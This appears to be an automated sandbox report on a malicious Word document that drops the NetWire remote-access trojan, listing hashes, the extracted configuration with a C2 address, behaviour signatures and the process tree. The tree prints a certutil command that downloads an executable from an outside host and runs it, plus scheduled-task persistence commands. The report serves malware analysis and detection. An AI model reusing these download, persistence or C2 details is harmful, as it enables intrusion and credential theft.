Analysis

  • max time kernel
    119s
  • max time network
    135s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-09-2022 10:31

General

  • Target

    RFQ 80479040.doc

  • Size

    62KB

  • MD5

    6328c4a16d653cb10c3b042301b2d6c3

  • SHA1

    4dba059a50044581f2741868ce850618a042f0b5

  • SHA256

    9e7f45fc3fe9b1849e1308f416aa57cf62588ca43359630649943b40fcf07856

  • SHA512

    6d46cc27a4786b0072f1a53cdbd6e3c42e646b6f441ef39eee0630e37863c90bf8c8e40ee026af7cd98ac14474ff96b787ccab941f995fd7db80d0dcc4c2725f

  • SSDEEP

    384:OkUgY5j96eYPKNiaI1WAE7OCb8iSUR/8dEv8krqrf4INzte/DZeIESy3uGjGWi2S:OP5I5I/q/qsfZ3qHGjG/owKSqXI

Malware Config

Extracted

Family

netwire

C2

37.0.14.206:3384

Attributes
  • activex_autorun

    false

  • copy_executable

    true

  • delete_original

    false

  • host_id

    HostId-%Rand%

  • install_path

    %AppData%\Install\Host.exe

  • keylogger_dir

    %AppData%\Logs\

  • lock_executable

    true

  • offline_keylogger

    true

  • password

    Password234

  • registry_autorun

    false

  • use_mutex

    false

Signatures

  • NetWire RAT payload 5 IoCs
  • Netwire

    Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Downloads MZ/PE file
  • Executes dropped EXE 5 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RFQ 80479040.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4672
    • C:\Windows\System32\certutil.exe
      "C:\Windows\System32\certutil.exe" -urlcache -split -f https://teqturn.com/goblin/ea05f1fD14F2Jju.exe C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe
      2⤵
      • Process spawned unexpected child process
      PID:2648
    • C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe
      "C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:852
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NksNHqr" /XML "C:\Users\Admin\AppData\Local\Temp\tmp251C.tmp"
        3⤵
        • Creates scheduled task(s)
        PID:4736
      • C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe
        "{path}"
        3⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:5024
        • C:\Users\Admin\AppData\Roaming\Install\Host.exe
          "C:\Users\Admin\AppData\Roaming\Install\Host.exe"
          4⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2780
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NksNHqr" /XML "C:\Users\Admin\AppData\Local\Temp\tmp90E6.tmp"
            5⤵
            • Creates scheduled task(s)
            PID:3212
          • C:\Users\Admin\AppData\Roaming\Install\Host.exe
            "{path}"
            5⤵
            • Executes dropped EXE
            PID:4220
          • C:\Users\Admin\AppData\Roaming\Install\Host.exe
            "{path}"
            5⤵
            • Executes dropped EXE
            PID:3908

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Credential Access

Credentials in Files

1
T1081

Discovery

Query Registry

3
T1012

System Information Discovery

4
T1082

Collection

Data from Local System

1
T1005

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe
    Filesize

    882KB

    MD5

    95b5d76bfb2204011333248cc121b5a4

    SHA1

    6faea7983c34f12cec7d22184be0eb1693e0abaf

    SHA256

    849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e

    SHA512

    966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152

  • C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe
    Filesize

    882KB

    MD5

    95b5d76bfb2204011333248cc121b5a4

    SHA1

    6faea7983c34f12cec7d22184be0eb1693e0abaf

    SHA256

    849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e

    SHA512

    966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152

  • C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe
    Filesize

    882KB

    MD5

    95b5d76bfb2204011333248cc121b5a4

    SHA1

    6faea7983c34f12cec7d22184be0eb1693e0abaf

    SHA256

    849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e

    SHA512

    966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152

  • C:\Users\Admin\AppData\Local\Temp\tmp251C.tmp
    Filesize

    1KB

    MD5

    e3110e1fc5bfa53e5636b145c05a9dd2

    SHA1

    ccaaa930eae7676f078baaafef310a0e60e2b196

    SHA256

    7bd775873865bef88fe486aba38d1e26483aa5d9475b8f51149458eda843ba3a

    SHA512

    aa095af6006f03afd5003013b7e9be9e338811ee0ca1647d37d9ef203e826c7e67486f81861f70653eb6125d2f49be6878d7d705eeff8936d2fd2ca00450a314

  • C:\Users\Admin\AppData\Local\Temp\tmp90E6.tmp
    Filesize

    1KB

    MD5

    e3110e1fc5bfa53e5636b145c05a9dd2

    SHA1

    ccaaa930eae7676f078baaafef310a0e60e2b196

    SHA256

    7bd775873865bef88fe486aba38d1e26483aa5d9475b8f51149458eda843ba3a

    SHA512

    aa095af6006f03afd5003013b7e9be9e338811ee0ca1647d37d9ef203e826c7e67486f81861f70653eb6125d2f49be6878d7d705eeff8936d2fd2ca00450a314

  • C:\Users\Admin\AppData\Roaming\Install\Host.exe
    Filesize

    882KB

    MD5

    95b5d76bfb2204011333248cc121b5a4

    SHA1

    6faea7983c34f12cec7d22184be0eb1693e0abaf

    SHA256

    849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e

    SHA512

    966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152

  • C:\Users\Admin\AppData\Roaming\Install\Host.exe
    Filesize

    882KB

    MD5

    95b5d76bfb2204011333248cc121b5a4

    SHA1

    6faea7983c34f12cec7d22184be0eb1693e0abaf

    SHA256

    849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e

    SHA512

    966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152

  • C:\Users\Admin\AppData\Roaming\Install\Host.exe
    Filesize

    882KB

    MD5

    95b5d76bfb2204011333248cc121b5a4

    SHA1

    6faea7983c34f12cec7d22184be0eb1693e0abaf

    SHA256

    849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e

    SHA512

    966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152

  • C:\Users\Admin\AppData\Roaming\Install\Host.exe
    Filesize

    882KB

    MD5

    95b5d76bfb2204011333248cc121b5a4

    SHA1

    6faea7983c34f12cec7d22184be0eb1693e0abaf

    SHA256

    849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e

    SHA512

    966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152

  • memory/852-141-0x0000000000000000-mapping.dmp
  • memory/852-143-0x0000000000EB0000-0x0000000000F92000-memory.dmp
    Filesize

    904KB

  • memory/852-144-0x0000000005DC0000-0x0000000006364000-memory.dmp
    Filesize

    5.6MB

  • memory/852-145-0x0000000005810000-0x00000000058A2000-memory.dmp
    Filesize

    584KB

  • memory/852-146-0x0000000005950000-0x00000000059EC000-memory.dmp
    Filesize

    624KB

  • memory/852-147-0x0000000005920000-0x000000000592A000-memory.dmp
    Filesize

    40KB

  • memory/2648-139-0x0000000000000000-mapping.dmp
  • memory/2780-155-0x0000000000000000-mapping.dmp
  • memory/3212-159-0x0000000000000000-mapping.dmp
  • memory/3908-168-0x0000000000400000-0x0000000000433000-memory.dmp
    Filesize

    204KB

  • memory/3908-167-0x0000000000400000-0x0000000000433000-memory.dmp
    Filesize

    204KB

  • memory/3908-163-0x0000000000000000-mapping.dmp
  • memory/4220-161-0x0000000000000000-mapping.dmp
  • memory/4672-136-0x00007FFD203D0000-0x00007FFD203E0000-memory.dmp
    Filesize

    64KB

  • memory/4672-171-0x00007FFD203D0000-0x00007FFD203E0000-memory.dmp
    Filesize

    64KB

  • memory/4672-132-0x00007FFD203D0000-0x00007FFD203E0000-memory.dmp
    Filesize

    64KB

  • memory/4672-137-0x00007FFD1E2C0000-0x00007FFD1E2D0000-memory.dmp
    Filesize

    64KB

  • memory/4672-173-0x00007FFD203D0000-0x00007FFD203E0000-memory.dmp
    Filesize

    64KB

  • memory/4672-135-0x00007FFD203D0000-0x00007FFD203E0000-memory.dmp
    Filesize

    64KB

  • memory/4672-138-0x00007FFD1E2C0000-0x00007FFD1E2D0000-memory.dmp
    Filesize

    64KB

  • memory/4672-134-0x00007FFD203D0000-0x00007FFD203E0000-memory.dmp
    Filesize

    64KB

  • memory/4672-172-0x00007FFD203D0000-0x00007FFD203E0000-memory.dmp
    Filesize

    64KB

  • memory/4672-133-0x00007FFD203D0000-0x00007FFD203E0000-memory.dmp
    Filesize

    64KB

  • memory/4672-170-0x00007FFD203D0000-0x00007FFD203E0000-memory.dmp
    Filesize

    64KB

  • memory/4736-148-0x0000000000000000-mapping.dmp
  • memory/5024-154-0x0000000000400000-0x0000000000433000-memory.dmp
    Filesize

    204KB

  • memory/5024-150-0x0000000000000000-mapping.dmp
  • memory/5024-151-0x0000000000400000-0x0000000000433000-memory.dmp
    Filesize

    204KB

  • memory/5024-158-0x0000000000400000-0x0000000000433000-memory.dmp
    Filesize

    204KB